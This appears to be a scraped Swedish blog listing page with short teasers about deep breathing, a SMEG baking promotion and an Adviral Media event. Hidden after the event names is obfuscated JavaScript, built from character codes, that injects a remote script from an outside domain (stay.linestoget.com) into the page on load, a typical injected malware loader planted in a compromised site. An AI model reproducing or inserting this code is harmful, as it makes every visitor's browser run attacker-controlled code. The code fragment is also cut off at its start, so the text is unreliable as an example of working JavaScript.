Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/